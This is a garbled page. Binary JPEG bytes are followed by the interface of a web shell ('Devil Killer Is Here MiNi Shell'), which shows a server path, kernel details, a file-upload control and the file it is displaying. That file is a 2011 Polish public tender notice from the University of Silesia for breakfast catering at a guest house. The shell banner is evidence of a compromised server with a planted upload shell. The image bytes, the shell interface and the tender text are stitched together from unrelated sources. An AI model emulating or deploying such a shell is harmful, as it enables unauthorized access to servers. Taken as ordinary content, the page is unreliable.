JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111206/319525-N-2011.html

<p class="kh_header"><b>Katowice: USŁUGĘ SERWOWANIA ŚNIADAŃ DLA GOŚCI DOMU ASYSTENTA NR 3, ZLOKALIZOWANEGO PRZY UL. PADEREWSKIEGO 32 W KATOWICACH</b><br>
<b>Numer ogłoszenia: 319525 - 2011; data zamieszczenia: 06.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Śląski w Katowicach Dział Zamówień Publicznych , ul. Bankowa 12, 40-007 Katowice, woj. śląskie, tel. 032 3592048, faks 032 3592048.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.us.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGĘ SERWOWANIA ŚNIADAŃ DLA GOŚCI DOMU ASYSTENTA NR 3, ZLOKALIZOWANEGO PRZY UL. PADEREWSKIEGO 32 W KATOWICACH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> <BR>1. Przedmiotem zamówienia jest: Serwowane śniadań dla gości Domu Asystenta nr 3, zlokalizowanego w Katowicach przy ul. Paderewskiego 32. <BR>
2. Zamawiający  dopuszcza możliwość składania ofert częściowych w następujących częściach: <BR>
1) W ramach części A - przedmiotem zamówienia jest świadczenie usług cateringowych w zakresie serwowania śniadań dla gości hotelowych w terminie od 01.01.2012r. do 31.01.2012r. tj. 1 miesiąc, w maksymalnej przewidywanej ilości tj.: 900 zestawów śniadaniowych. <BR>
a) Podana wyżej ilość śniadań jest ilością przewidywaną (maksymalną) dlatego Zamawiający zastrzega sobie prawo do niewykorzystania tej ilości zestawów śniadaniowych. <BR>
b) Przedmiot zamówienia winien być realizowany z należytą starannością, co oznacza zapewnienie wysokiej jakości śniadania /świeże, urozmaicone, estetycznie podane/ zgodnie z obowiązującymi przepisami w kwestii żywienia zbiorowego i cateringu. <BR>
c) Zamawiający dysponuje 100 miejscami hotelowymi w związku z tym Wykonawca winien być w gotowości do realizacji 100 śniadań dziennie. Pokoje usytuowane są na 5 kondygnacjach budynku /parter + 4 piętra/, budynek nie posiada windy. <BR>
d) Zamawiający umożliwia dokonanie wizji lokalnej po wcześniejszym, telefonicznym umówieniu się. Osobą do kontaktów w sprawie wizji lokalnej jest p. Małgorzata Szymańska Tel. 32 255-44-33. <BR>
e) Zamawiający nie udostępnia oddzielnego pomieszczenia ani żadnego innego miejsca dla Wykonawcy celem realizacji przedmiotu zamówienia. <BR>
f) Wykonawca winien realizować przedmiot umowy przy użyciu własnego sprzętu koniecznego do prawidłowego zrealizowania zamówienia. Wszelkie naczynia, opakowania, kubeczki, termosy, podgrzewacze, sztućce plastikowe w tym małe łyżeczki itp. zabezpiecza Wykonawca. <BR>
2) W ramach części B - przedmiotem zamówienia jest  świadczenie usług gastronomicznych w zakresie serwowania śniadań w formie szwedzkiego stołu dla gości hotelowych w lokalu, który odpłatnie udostępnia Zamawiający, w terminie od 01.02.2012r. do 31.01.2014r. tj. 24 miesiące, z tym że Zamawiający udostępni Wykonawcy odpłatnie lokal od 01.01.2012r. celem technicznego i estetycznego przygotowania go do realizacji usługi. <BR>
a) Maksymalna, przewidywana ilość śniadań w okresie realizacji usługi wynosi 23.000 szt. Zamawiający zastrzega sobie prawo do niewykorzystania tej ilości śniadań. <BR>
b) Przedmiot zamówienia winien być realizowany z należytą starannością, co oznacza zapewnienie wysokiej jakości posiłków /świeże, urozmaicone, estetycznie podane / zgodnie z obowiązującymi przepisami w kwestii żywienia zbiorowego. Zamawiający nie dopuszcza serwowania posiłków typu fast-food oraz przygotowanych np. na bazie gotowych dań czy półproduktów do odgrzania. <BR>
c) Zamawiający dysponuje 100 miejscami hotelowymi w związku z tym Wykonawca winien być w gotowości do realizacji 100 śniadań dziennie. Zasadą serwowania śniadań jest forma szwedzkiego stołu. Wydawanie śniadań winno odbywać się w formie samoobsługi.<BR>
d) W celu realizacji przedmiotu zamówienia Zamawiający jako właściciel budynku Dom Asystenta nr 3 w Katowicach udostępni Wykonawcy w w/w budynku puste pomieszczenie nr 24 stanowiące zaplecze oraz salę konsumpcyjną o łącznej powierzchni 46 m2, wyposażone w instalacje: co, wod.-kan., elektryczną oraz wewnętrzną linię telefoniczną. Pomieszczenie zostanie udostępnione odpłatnie. 
e) Zamawiający umożliwia dokonanie wizji lokalnej po wcześniejszym, telefonicznym umówieniu się. Osobą do kontaktów w sprawie wizji lokalnej jest p. Małgorzata Szymańska Tel. 32 255-44-33. <BR>
2. Szczegółowy opis przedmiotu zamówienia zawarto w załączniku nr 2 do  Specyfikacji. <BR>  
3. Wymagany termin realizacji: <BR> 
Dla części A: od 01.01.2012r. do 31.01.2012r.<BR> 
Dla części B: od 01.01.2012r. do 31.01.2014r. z zastrzeżeniem, że Wykonawca rozpocznie serwowanie śniadań od 01.02.2012r. <BR>
4. Miejsce świadczenia usługi - Dom Asystenta nr 3, zlokalizowany w Katowicach, ul. Paderewskiego 32. <BR>
6. Zamawiający dopuszcza możliwość realizacji zamówienia z udziałem podwykonawców. W przypadku korzystania z podwykonawców w ofercie należy wskazać część zamówienia, której wykonanie Wykonawca powierzy podwykonawcom (załącznik nr 5 do SIWZ)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p><BR>W zakresie części A <BR> 
Wykonawca musi posiadać aktualne zezwolenie na prowadzenie działalności cateringowej, udokumentowane decyzją właściwego organu inspekcji sanitarnej. <BR>
Ocena spełnienia warunków udziału w postępowaniu. <BR>
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca złoży do oferty oświadczenia i dokumenty potwierdzające spełnienie w/w warunku: <BR>
1. oświadczenie o spełnieniu warunków udziału w postępowaniu (załącznik nr 1B do SIWZ), <BR>
2. Aktualne zezwolenie na prowadzenie działalności cateringowej, wydane przez właściwego Państwowego Inspektora Sanitarnego,
- o których mowa w rozdziale IV ust. 1 pkt 1 i 2. <BR>
W zakresie części B <BR>
 Zamawiający nie konkretyzuje powyższego warunku poprzez stworzenie opisu sposobu dokonywania oceny jego spełniania. Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu, o którym mowa w rozdziale IV ust. 1 pkt. 1 SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać wiedzę i doświadczenie w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech (3) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: <BR>
W zakresie części A <BR>
w wykonaniu minimum 2 usług cateringowych obejmujących zestawy śniadań i/lub obiadów i/lub kolacji w w ilości jednorazowej nie mniejszej niż  70 zestawów śniadań i/lub obiadów i/lub kolacji, bez względu na wartość. <BR> 
W zakresie części B <BR>
w wykonaniu lub wykonywaniu minimum 1 usługi w zakresie realizowania śniadań w postaci szwedzkiego stołu, bez względu na wartość. <BR>
Przez jedną usługę Zamawiający rozumie świadczenie realizowane w ramach jednej umowy.<BR>
Ocena spełnienia warunków udziału w postępowaniu. <BR>
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca złoży do oferty oświadczenia i dokumenty potwierdzające spełnienie w/w warunku: <BR>
1. oświadczenie o spełnieniu warunków udziału w postępowaniu (załącznik nr 1B do SIWZ), <BR>
Dotyczy części A <BR>
2. Wykaz wykonanych (dotyczy części A), Wykaz wykonanych lub wykonywanych (dotyczy części B) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usług w zakresie niezbędnym do wykazania spełniania warunku dotyczącego posiadania wiedzy i doświadczenia, z podaniem ich wartości,  przedmiotu,  dat wykonania  i odbiorców (załącznik nr 1D do SIWZ), oraz załączeniem dokumentów (np. referencji) potwierdzających, że zamówienia te zostały wykonane lub są wykonywane należycie, 
- o których mowa w rozdziale IV ust. 1 pkt. 1 i 3.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje powyższego warunku poprzez stworzenie opisu sposobu dokonywania oceny jego spełniania. Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu, o którym mowa w rozdziale IV pkt 1 ppkt 1 SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje powyższego warunku poprzez stworzenie opisu sposobu dokonywania oceny jego spełniania. Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu, o którym mowa w rozdziale IV pkt 1 ppkt 1 SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania warunku dotyczącego sytuacji ekonomicznej i finansowej, Wykonawca winien posiadać ubezpieczenie OC w zakresie prowadzonej działalności w wysokości stanowiącej wartość lub równowartość co najmniej: <BR>
- Dla części A - 8.000,00 zł. <BR>
- Dla części B - 100.000,00 zł <BR>
a w przypadku ubiegania się o udzielenie zamówienia na obie części (A i B) na sumę wyższą spośród sum wskazanych tj. co najmniej 100.000,00 zł. <BR>
W przypadku podania wartości w walucie innej niż PLN, dla porównania ich wartości Zamawiający przyjmie średni kurs NBP z dnia zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. <BR>
Ocena spełnienia warunków udziału w postępowaniu: <BR> 
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca złoży do oferty oświadczenia i dokumenty potwierdzające  spełnienie w/w warunku: <BR>
1. oświadczenie o spełnieniu warunków udziału w postępowaniu (załącznik nr 1B do SIWZ), <BR>
2. opłaconą polisę lub inny dokument potwierdzający, że  Wykonawca jest ubezpieczony od odpowiedzialności cywilnej, w wysokości wymaganej przez Zamawiającego, 
- o których mowa w rozdziale IV ust. 1 pkt 1 i 4 SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli w celu wykazania spełnienia warunków określonych w art. 22 ust. 1 ustawy - Prawo zamówień publicznych, Wykonawca polega na zasobach innych podmiotów, na zasadach określonych w art. 26 ust. 2b ustawy - Prawo zamówień publicznych, zobowiązany będzie udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (stosowny dokument należy załączyć do oferty). <BR>
Pozostałe dokumenty: <BR>
1. Aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej - składa Wykonawca będący osoba fizyczną prowadzącą działalność gospodarczą 
(Zamawiający zaleca dołączenie do oferty) <BR>
2. Pełnomocnictwo - wymagane jeżeli oferta jest podpisana przez pełnomocnika (z wyłączeniem prokurenta), nawet jeżeli jest on ujawniony w dokumencie rejestrowym. 
W razie wątpliwości co do ważności lub zakresu posiadanego pełnomocnictwa Zamawiający zastrzega sobie prawo do żądania potwierdzenia pełnomocnictwa przez Wykonawcę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana zawartej umowy (Aneks). <BR>
1. Zmiana treści umowy może nastąpić wyłącznie w granicach unormowania art. 144 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych i pod rygorem nieważności wymaga formy pisemnego aneksu skutecznego po podpisaniu przez obie Strony. <BR>
2. Zamawiający może wyrazić zgodę na dokonanie istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, wyłącznie w sytuacji: <BR>
1) konieczności przesunięcia terminu realizacji zamówienia, jeśli konieczność ta nastąpiła na skutek okoliczności, których nie można było przewidzieć w chwili zawierania umowy i nie wynika z winy Wykonawcy, <BR>
2) konieczności przesunięcia terminu realizacji zamówienia, jeśli konieczność ta nastąpiła na skutek okoliczności leżących po stronie Zamawiającego, <BR>
3) konieczność zmiany miejsca realizacji zamówienia jeśli konieczność ta nastąpiła na skutek okoliczności leżących po stronie Zamawiającego lub okoliczności, za które Zamawiający nie ponosi odpowiedzialności (siła wyższa). <BR>
4) zmiany sposobu realizacji zamówienia z samodzielnej realizacji przez Wykonawcę, na realizację z udziałem podwykonawców, z zastrzeżeniem, iż podwykonawcy będą posiadać właściwości niezbędne, do realizacji danej części zamówienia; <BR>
5) zmiany zakresu czynności wykonywanych przez podwykonawcę/-ów (dotyczy przypadku, w którym Wykonawca posługuje się potencjałem podwykonawców),
6) zmiany powszechnie obowiązujących przepisów w zakresie mającym wpływ na realizacje umowy, <BR>
7) ustawowej zmiany stawek podatkowych (VAT) w okresie obowiązywania umowy. Zamawiający nie dopuszcza możliwości zwiększenia kwot z podatkiem VAT, o których mowa w §6 ust.  1 (dla części A) i ust.8 (dla części B) wzoru umowy. <BR>
8) w sytuacji zmiany ceny w przypadku, kiedy zmiana ta będzie korzystna dla Zamawiającego tzn. na cenę niższą - na pisemny wniosek jednej ze Stron.
 9) w sytuacji  zmiany stawki czynszu (bez VAT), o której mowa w § 6 ust. 1 - część B wzoru umowy. Zmiana stawki nie może być wyższa niż ogłaszany przez GUS średnioroczny wskaźnik wzrostu cen towarów i usług konsumpcyjnych za poprzedni rok. Wysokość stawki, będzie waloryzowana corocznie, począwszy od roku 2013, każda zmiana nastąpi nie wcześniej niż po ogłoszeniu wskaźnika przez GUS. Nowa stawka obowiązywać będzie od pierwszego dnia miesiąca następującego po miesiącu, w którym Strony ustaliły nową stawkę. <BR>
10) w sytuacji zmiany wysokości opłaty eksploatacyjnej (bez VAT) za pomieszczenie lub w przypadku zmiany  zasad w  udostępnianiu pomieszczenia - dotyczy części B.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.us.edu.pl/zamowienia-publiczne/1/u/1<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet Śląski Dział Zamówień Publicznych 40-007 Katowice ul. Bankowa 12 p. 69 IIIp.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.12.2011 godzina 09:30, miejsce: Uniwersytet Śląski Dział Zamówień Publicznych 40-007 Katowice ul. Bankowa 12 p. 69 IIIp.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 12.01.2012.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część A - świadczenie usług cateringowych w zakresie serwowania śniadań dla gości hotelowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Świadczenie usług cateringowych w zakresie serwowania śniadań dla gości hotelowych w terminie od 01.01.2012r. do 31.01.2012r. tj. 1 miesiąc, w maksymalnej przewidywanej ilości tj.: 900 zestawów śniadaniowych. <BR> 
a) Podana wyżej ilość śniadań jest ilością przewidywaną (maksymalną) dlatego Zamawiający zastrzega sobie prawo do niewykorzystania tej ilości zestawów śniadaniowych. <BR>
b) Przedmiot zamówienia winien być realizowany z należytą starannością, co oznacza zapewnienie wysokiej jakości śniadania /świeże, urozmaicone, estetycznie podane/ zgodnie z obowiązującymi przepisami w kwestii żywienia zbiorowego i cateringu.  <BR>
c) Zamawiający dysponuje 100 miejscami hotelowymi w związku z tym Wykonawca winien być w gotowości do realizacji 100 śniadań dziennie. Pokoje usytuowane są na 5 kondygnacjach budynku /parter + 4 piętra/, budynek nie posiada windy. <BR>
d) Zamawiający umożliwia dokonanie wizji lokalnej po wcześniejszym, telefonicznym umówieniu się. Osobą do kontaktów w sprawie wizji lokalnej jest p. Małgorzata Szymańska Tel. 32 255-44-33.<BR>
e) Zamawiający nie udostępnia oddzielnego pomieszczenia ani żadnego innego miejsca dla Wykonawcy celem realizacji przedmiotu zamówienia. <BR>
f) Wykonawca winien realizować przedmiot umowy przy użyciu własnego sprzętu koniecznego do prawidłowego zrealizowania zamówienia. Wszelkie naczynia, opakowania, kubeczki, termosy, podgrzewacze, sztućce plastikowe w tym małe łyżeczki itp. zabezpiecza Wykonawca. <BR>
Szczegółowy opis przedmiotu zamówienia zawarto w załączniku nr 2 do  Specyfikacji. <BR>  
Wymagany termin realizacji: od 01.01.2012r. do 31.01.2012r. <BR> 
 Miejsce świadczenia usługi - Dom Asystenta nr 3, zlokalizowany w Katowicach, ul. Paderewskiego 32..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
